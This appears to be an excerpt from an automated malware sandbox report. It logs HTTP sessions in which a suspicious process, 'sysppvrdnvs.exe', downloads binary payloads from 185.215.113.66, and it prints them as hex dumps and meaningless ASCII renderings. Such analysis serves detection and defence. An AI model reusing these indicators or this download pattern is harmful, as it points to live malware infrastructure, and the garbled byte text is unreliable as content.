                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a973-3f00"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163960934 CEST112INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                            Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163969994 CEST1236INData Raw: e7 fb dd bb ba 5c 82 d9 10 01 16 0b d1 18 bc a5 c1 52 27 e6 01 29 e5 a1 94 eb 5a d4 9c d9 0e c6 b9 08 0f 7b d1 dc 97 ca 03 fd 8d 9b 69 02 43 7f bb 2c 1c 7d 27 9e f3 1f 9e 05 68 84 fa 43 bc b1 ac 68 af c3 ad 35 ee 5b d6 9c 1a 77 52 47 90 d7 8d 40
                                                                                                                                                                                            Data Ascii: \R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He&qs*ukH7<IzH6=Azqk]9hlg:k.vK4"N[e:M;2/KUNMlRA8Wh!&J|-^=_4g
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163997889 CEST1236INData Raw: b1 75 f1 15 cb 86 00 f9 d2 09 b9 72 00 86 b3 62 b8 79 f4 fb 15 63 27 e6 0f f3 9d cc 58 84 67 d0 2a 79 38 b5 38 8b 83 a3 b9 28 be b7 42 41 f1 e2 6f 71 f2 62 ff 1e ca cc 92 cb 5c 33 6d 63 32 ac e4 6b dc 87 0a 85 d5 67 26 93 df 3b 10 52 0d ea 61 b6
                                                                                                                                                                                            Data Ascii: urbyc'Xg*y88(BAoqb\3mc2kg&;Rao#``2C(BRcAEy3.(d{A#/h>(HyN}X2m+@0'+gU2OduQa17j(rEw3<&tLi)DVo|
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164011002 CEST1236INData Raw: d8 09 89 b1 d7 c1 86 84 f9 13 dc c1 36 ee be 66 f7 71 8d 09 90 88 b0 96 8c 7b 3e 17 51 9c 15 e7 41 82 42 c7 31 54 d7 5b 14 eb b7 f3 c8 13 87 aa bd 7e 33 9e 23 c8 56 c6 ce a6 ea 50 76 b9 e3 96 b0 7c c2 6c 0b a6 f7 46 94 8d 3b 1a 07 d9 08 79 88 cc
                                                                                                                                                                                            Data Ascii: 6fq{>QAB1T[~3#VPv|lF;yHu^-z|&#BzHrsexJJe"xg+b-&x[m,Vb/WUEetS~F/xhfo&Y.=yU9hwaL{%+
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164021015 CEST1236INData Raw: 19 02 a2 14 1c 5c f8 33 91 43 05 0f 10 5b 36 4e 33 6e 72 e4 a5 c4 64 ad c7 23 59 66 34 55 86 66 04 97 82 11 f7 a5 ef dc c3 9e 51 80 22 5e 2c 60 02 3a 66 b3 ee 3d eb 6b 9b 1d e3 46 9e e8 27 e7 0b 4f 88 47 d9 2e c3 cd 9e 75 a9 d3 cb 32 87 7e 6f df
                                                                                                                                                                                            Data Ascii: \3C[6N3nrd#Yf4UfQ"^,`:f=kF'OG.u2~o8?_s}T^_+=y?PtVOD/mpDVQ*jj&!-6Ma:|G@`Rw<,ywV#eeEVBAH/^Cpo#=S-s
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164038897 CEST1236INData Raw: b3 8a 6d 78 63 1f c4 c8 ca 3a eb 3b cd 3e 62 0d 72 9a 27 de 43 39 78 9c ea d8 99 7e 04 d5 2e a0 80 11 ec 2e ac 36 4f 9a 76 d3 98 1b 86 d0 ab 61 d0 01 a6 bd 2c 49 78 d2 d5 cb 25 be 51 b0 e6 81 4c f4 b0 a8 1c 36 9d d5 0c 28 48 fd 81 2d 6f 05 fc a1
                                                                                                                                                                                            Data Ascii: mxc:;>br'C9x~..6Ova,Ix%QL6(H-oeq@.>SX~^x~QKCmJr1FhW)U`aQfN3Dh4O,2WMtQ|kBE=L~] ;jZG#Ad^7p7:Elc
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164061069 CEST1236INData Raw: 24 d3 59 e5 1c a8 d5 57 ee 8f 8a ce aa fe e0 a5 e1 7c ec 78 14 05 4c 0b fc 7d 59 5a 4f 0a 0a 45 fb 59 40 65 b7 09 10 12 46 aa 1d f5 0a 68 b4 50 ae de 46 80 b0 01 a4 7e 31 b4 ae 4a bf c3 47 40 19 0b cb a9 79 65 34 e0 23 ea ad f0 6d 19 35 f8 c7 59
                                                                                                                                                                                            Data Ascii: $YW|xL}YZOEY@eFhPF~1JG@ye4#m5YE8mA!pV7>S?5XK=`:btHho/I-6JM5[c}0'z 8g'?Q<Py*P-DH_gb9LKb
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164076090 CEST1236INData Raw: 0b 35 71 62 f9 1d ac 2a 64 58 bb 10 d9 77 62 3e dc 30 dd c7 43 2d 5d eb e5 8c bd a1 97 c0 0d 13 9d 0c 5b 49 75 9d 38 67 8c 80 10 8f c5 9c b3 16 c9 da dd a8 13 05 97 09 a4 67 5e ef 2a 11 a4 e7 6c 38 f1 9b 08 1d 22 eb 1b d0 de a0 b1 13 57 7e cb e1
                                                                                                                                                                                            Data Ascii: 5qb*dXwb>0C-][Iu8gg^*l8"W~Qx! jtDsCZw\]9HG5/CRWhR5)*"~#~8z&lkL{GV1+!Y&IAFt+B\?o?ZMXksfB"+0Zl
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164087057 CEST1236INData Raw: 9f f2 a1 14 fd 6d 6a b8 6f 4b ab db 84 f9 ff f3 e6 47 f8 eb 2c bb 24 17 33 9a 1c 77 00 e1 ee 89 c0 ac 6b d0 83 08 0a e0 5d eb 95 00 40 c1 98 be 3f 58 a0 c8 44 7b 4b a9 4a 24 4b a3 a7 cb 65 bc e5 e7 fb 4c de a6 b7 78 e6 c0 89 89 a5 7f f1 89 44 da
                                                                                                                                                                                            Data Ascii: mjoKG,$3wk]@?XD{KJ$KeLxD0^T3-nj*Q2|`wG):O]az~bk7cHE&h_0nGy_1[ou5l:iZ2~q:NGp&*Euhl"y3Y
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164206028 CEST1236INData Raw: f2 42 d2 99 98 da c1 36 e7 b0 0b e9 cd 8d ab 05 d9 33 c6 68 81 63 df 77 81 9d b5 c9 86 30 73 5e b3 3f b8 69 d7 ae c1 be d4 3d af 59 1e dd c8 6f b4 63 56 71 0f 59 32 30 4c ed 0d 26 29 8c 84 50 84 33 c7 e2 7d 93 b5 2c fe 8d 60 d2 43 de 02 99 5b 76
                                                                                                                                                                                            Data Ascii: B63hcw0s^?i=YocVqY20L&)P3},`C[v-8c(dj7FX%w^'Es=#OX@z4uriME7t76e1t&vQM}:*)}Ui=`)o?+?s


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            14192.168.2.650006185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:42.205141068 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131649017 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:42 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 10496
                                                                                                                                                                                            Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67154d18-2900"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131679058 CEST1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                            Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131695032 CEST1236INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                                                                                            Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131759882 CEST1236INData Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02
                                                                                                                                                                                            Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SU*rN1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;B
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131778002 CEST448INData Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36
                                                                                                                                                                                            Data Ascii: sarI4ns;?E*;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4*Hft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131794930 CEST1236INData Raw: aa fa 62 12 93 06 96 26 10 ad ee 3f 3a 32 0f 63 b0 c9 34 e0 c6 5d 26 60 69 44 af c5 91 85 d2 84 09 89 f2 6c 3d 84 bc 18 7a 15 34 45 a4 64 67 41 97 93 05 44 ff df 37 26 13 b8 c0 69 cd d0 4d e7 a8 07 3a c0 b4 91 f1 c8 d0 9a 5f ec 8d 18 a9 e0 47 12
                                                                                                                                                                                            Data Ascii: b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&q"Ka4tO>]=7PpVra;AyN<.O~`=]/
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131809950 CEST1236INData Raw: 55 fa f6 a6 80 b6 6c 83 d2 ea 2f d6 f9 a2 96 d2 ee 32 1d 3a 03 4f 21 69 97 4b 76 be d4 fd 5e 94 dc b6 91 f9 89 7f 6c da 9f c8 b4 c1 a7 bb 31 3d 07 3e 88 72 f1 4a fa 21 3b fb e2 1e 9e 3d 7f 77 4a 6f 8a 09 14 20 4f f5 68 09 fe f2 df 7a 11 bb 4f 3d
                                                                                                                                                                                            Data Ascii: Ul/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKdPSmy"Y9o3QBqYV#Vr8C7ClU8.* /;7(^
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131828070 CEST1236INData Raw: e3 8d 21 bb 4e dc cd 1a 6c ff 09 f1 d9 48 e3 7c af 33 cf be 1b 12 df 57 72 de 12 b5 be b0 1f a7 be 3a f9 9e ce 06 d1 45 e2 08 a7 d4 27 85 c9 b9 72 d1 c2 ba 68 f3 74 f6 c7 76 f4 e9 47 ea d4 1f d2 e2 2e 77 47 36 12 b0 6e 3d 2d c0 7a 09 e7 50 4b 2c
                                                                                                                                                                                            Data Ascii: !NlH|3Wr:E'rhtvG.wG6n=-zPK,,jhMRD Yi=8S7=3R]TwZW9^hx``\vkU&lJuGoexF*-~Q;Y0oqb=gP/
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131844997 CEST1236INData Raw: 6d f2 73 85 6a 12 77 5c 9c 23 69 0c 30 2b 83 58 15 a7 0a 78 8b d9 e7 3c ae 29 59 e8 ea 2f 27 38 7d e8 bb 4d 38 96 ba 51 f9 ba 97 69 65 26 64 09 72 dc ea 15 d0 f3 9f dc 20 ab d3 42 81 d3 e8 76 59 6e 48 e8 85 96 02 c2 32 90 15 58 76 d7 70 d4 04 7c
                                                                                                                                                                                            Data Ascii: msjw\#i0+Xx<)Y/'8}M8Qie&dr BvYnH2Xvp|hMDGRnV - mS&9TMhZN<^'l}I4n/(U*SQ0EGuKMMv^+ QYI_UyC8v#"=<dYz %.:
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131860018 CEST425INData Raw: 2b 8a 4c 0c ab 7f f0 c9 c5 94 f0 f3 80 3c ef ed 6b d8 9f 62 a8 03 27 e0 17 47 67 28 76 ac c8 d7 10 f0 b9 a3 f7 71 ce 49 93 4a 84 9c b0 8f ce 95 f4 29 88 c3 fe cf 80 c4 bc 4c 70 ad 6a 6c 7c 6f be e7 dc 2b 1c 0f 02 6e 4a 1f 45 95 24 7e 38 17 1d ca
                                                                                                                                                                                            Data Ascii: +L<kb'Gg(vqIJ)Lpjl|o+nJE$~8)XrJ]|a<YaZ#A||fsmK?|-s;Q|fGfAJPzKPKkg~3}lScv?Rje%t|WYFuy3cs{^


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            15192.168.2.650007185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:45.189408064 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111536026 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:45 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 13568
                                                                                                                                                                                            Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67179628-3500"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111578941 CEST212INData Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd
                                                                                                                                                                                            Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\*Sk}):rN]WO]1G>&!>dK*@i[]LzA)0N$w|n=29-
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111588955 CEST1236INData Raw: 42 fc 42 df b7 b7 f3 29 e3 7b d1 26 5a c7 49 32 0d 65 8a a5 6a f7 e4 d5 60 20 91 d3 74 10 ce 33 ff bd 7e 25 e2 51 42 fe 63 3d e9 32 f2 e4 5d 93 5c 4b 7f 04 99 cb 1a 85 1b ed c7 1d 1c eb 11 d6 36 d8 c2 11 57 e8 d6 f2 aa 71 3e c5 d7 b1 1c f4 a2 a0
                                                                                                                                                                                            Data Ascii: BB){&ZI2ej` t3~%QBc=2]\K6Wq>d?H4$*e[ist;0BeO#IeShA+< .Gw9`KCcv^21p P2_ri~,T31;TF^hT\t})tm
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111685991 CEST1236INData Raw: d5 8b a3 e0 ec 72 b0 ed a3 3a 73 e3 ac 27 8b 18 ae bb 5d 87 aa b3 db 40 94 0e 2d 3a 4e fb 12 dd 3d f2 dd d2 dd a3 72 80 4d 76 81 af 56 a9 06 82 ae ff 8a 79 49 37 1c a2 b7 3a 25 ed f2 08 ab 4d 8e dd 95 b1 5a 7d 61 fb d3 0b d2 02 20 1c 85 9c e0 7f
                                                                                                                                                                                            Data Ascii: r:s']@-:N=rMvVyI7:%MZ}a OaYrPQ;|<5c0aFh){B9hT-|`56el/9uLltfDO|CVi-|R)
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111696959 CEST1236INData Raw: 6d 04 43 b9 79 60 4f 47 2a b3 06 4b 9f 7a be d0 c0 38 dc 6c 17 43 1e 74 6c 00 69 b0 8d 22 0a 73 79 98 ca 5f 43 59 c7 44 73 8d 02 a0 d3 49 7e 61 8a bd dc b0 82 db 37 0b 45 a1 57 3c 51 92 f5 a2 fc aa c2 9b 3a 89 7a e3 e8 0c cd c5 9c 06 84 c4 a4 02
                                                                                                                                                                                            Data Ascii: mCy`OG*Kz8lCtli"sy_CYDsI~a7EW<Q:z\,2`+tpk@T-#_DswpTn[/Ar"6k=G]5-[<FMBL]T"vV@#>:LkEIBIqI("
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111709118 CEST336INData Raw: 1d e8 10 4a fe b7 ee d7 2e e9 d1 70 53 ec 08 6d 77 87 ce ab f8 b4 8d 12 03 c2 d0 fc 32 58 ac ae c2 7d a6 ff 67 7c d6 bd 35 b0 14 41 eb 84 7f cc e3 42 77 6f 3d 2f e4 e7 77 5d a6 ee 11 a8 b8 42 97 f2 5a d3 93 6e e3 01 36 1e 1b d9 3d 8e 5a 07 fc 0e
                                                                                                                                                                                            Data Ascii: J.pSmw2X}g|5ABwo=/w]BZn6=Z!o{TVSz7[G8ZRb"wJ?is&w3M?8LBTa5Mr(*BDh)(l?ISrmXlv YF{R`[Rxi`Zi
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111721039 CEST1236INData Raw: 53 3c 7f 5f 04 8f 40 d3 e1 6d 7e ef d0 ee 8b 4c 89 9c 2d 82 22 96 f3 19 ea 8e 50 80 7b 5c d7 05 7d 5b 7e 29 d0 1a 83 28 52 85 a8 d8 dc 48 c4 7b 73 8d 4d 3a a2 05 bf 07 68 cc bb 4c 9e a2 5d 08 67 81 b6 83 60 6e 29 94 7c 44 b3 94 79 88 6d 17 8a 2c
                                                                                                                                                                                            Data Ascii: S<_@m~L-"P{\}[~)(RH{sM:hL]g`n)|Dym,ZsvtW;Y?!v)"A|kOB52R}k$s/Q69ANE<g`1YcbCg={8[]Mm~Hsk23{|D7'3-L
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111732960 CEST212INData Raw: 17 42 3b 25 c8 a7 b3 06 49 99 d9 20 a0 7f 71 ab a7 1d ed ac 9d 8a d2 cb 31 0e b8 b8 f7 49 2d 80 1b 0a c1 b1 c1 f5 fe d6 ee 5e 78 72 fb 14 f2 d9 70 8f 5b 63 85 85 9b 5f c7 40 b4 53 ac 8d 50 1a 12 2e f0 a7 fd 64 35 d7 18 2f 64 c3 b8 34 db e8 7d c3
                                                                                                                                                                                            Data Ascii: B;%I q1I-^xrp[c_@SP.d5/d4}P:&F!z.('X~l'-W&{@(Pl%@%&g~j1/{9RG"$(!G3_Q+#|R
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111745119 CEST1236INData Raw: b0 54 3c ea b6 fe f2 56 f2 97 f9 66 0d 3a 0c 09 da 5d a0 7d b1 4e 0a 0b 60 50 7e 7c f5 d0 4e 68 95 b5 e8 fa 1c e0 a7 2d a0 df d5 7b 39 90 7b 53 fe 97 35 08 d0 92 a5 9b a0 91 55 47 ae 1f d7 ae ed 09 8e 2c d7 42 6b 89 c7 54 b3 54 df 2a aa be ec 1d
                                                                                                                                                                                            Data Ascii: T<Vf:]}N`P~|Nh-{9{S5UG,BkTT*wv}b&#T%[*<9CVd>UkdiqB/bgW^2'N+SN*8s67H_qigq~+3s3p}U,<iv!f]
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111766100 CEST1236INData Raw: 1b 6e e4 43 19 c0 68 3c 9c 48 13 66 9f 7b 77 dd 47 41 4f cc fa 23 4e 14 97 51 c9 98 16 67 6f c9 be d6 81 80 eb 3d 7c 03 a0 39 36 ed 44 e2 9d d1 fb 26 46 c9 8d 91 e2 c8 49 6d 69 97 58 25 ce f1 66 e6 65 0b 92 e6 b8 92 17 50 df db f8 82 f6 d6 3a d2
                                                                                                                                                                                            Data Ascii: nCh<Hf{wGAO#NQgo=|96D&FImiX%feP:Ahg83Hn!cqiW3a{;<jJi.4nQ^tg61lAJN>n}xp<^;<3h;N2#8+x.>JK)X-B-MX*:X
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117161989 CEST1236INData Raw: 9b bb e7 5c a6 97 3f e4 20 41 d5 fa 26 2e 2a 54 1f 69 a6 56 9c db e4 59 9a cd c7 ec 78 ac 9e 9e 30 64 37 75 e7 f7 ef 74 6e 49 ba 84 a1 a3 f6 d6 d0 0b 93 43 5b ab 4c fc 9e 62 dc cf dc db a9 23 a8 69 36 31 d2 9a 83 be 42 9f 40 2b ba 09 53 22 a7 9b
